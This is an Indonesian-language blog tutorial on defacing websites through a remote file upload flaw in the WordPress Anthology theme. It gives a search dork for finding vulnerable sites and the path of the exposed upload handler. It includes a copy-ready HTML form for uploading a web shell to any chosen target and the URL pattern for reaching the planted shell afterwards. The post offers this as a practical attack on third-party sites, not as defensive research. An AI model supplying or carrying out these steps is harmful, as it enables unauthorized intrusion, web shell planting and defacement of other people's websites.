Header Ads

Home > Defacing > Exploit > Deface menggunakan WordPress Anthology Themes Remote File Upload Vulnerability

Deface menggunakan WordPress Anthology Themes Remote File Upload Vulnerability

Thursday, November 24, 2016 ,
 kali ini gua akan Share Tutorial Exploit WordPress Anthology Themes Remote File Upload Vulnerability
Dork: 
inurl:/wp-content/themes/Anthology/
(sisanya kembangin lagi, gunakan imajinasi vokever kalian, biar bisa dpt yang vuln and verawan).


1. Dorking dengan menggunakan SearchEngine

2. pilih salah satu web target yg pengen ente tusb0l pak wkwk, lalu masukan exploitnya.
exploit: target.co.li/wp-content/themes/Anthology/functions/upload-handler.php

3. Vulnerability ~ Muncul tulisan error atau Blank *kira2 sih gitu akkwakw *maap kalo salah <(")



vuln boss

Copy Script CSRF Upload nya:

<form enctype="multipart/form-data" 
action="target.co.li/wp-content/themes/Anthology/functions/upload-handler.php" method="post">
Please choose a file: <input name="pexetofile" type="file" /><br />
<input type="submit" value="upload" />
</form>

*save dgn ekstensi .html & ubah target.co.li jadi target yang mau lo tusbol


jika sudah buka CSRF Upload nya, lalu upload deh file/shell kalian.


Jika Upload nya sukses nanti akan muncul nama file/shell kalian gengs :3


sukses gengs :v

waktunya kita buka shell/file kita, gimana caranya o.O ?

Shell Akses: target.co.li/wp-content/uploads/[year]/[month]/namashell.php

Post a Comment

No comments

Silahkan Komentar dengan bahasa yang sopan

Subscribe to: Post Comments ( Atom )
Powered by Blogger.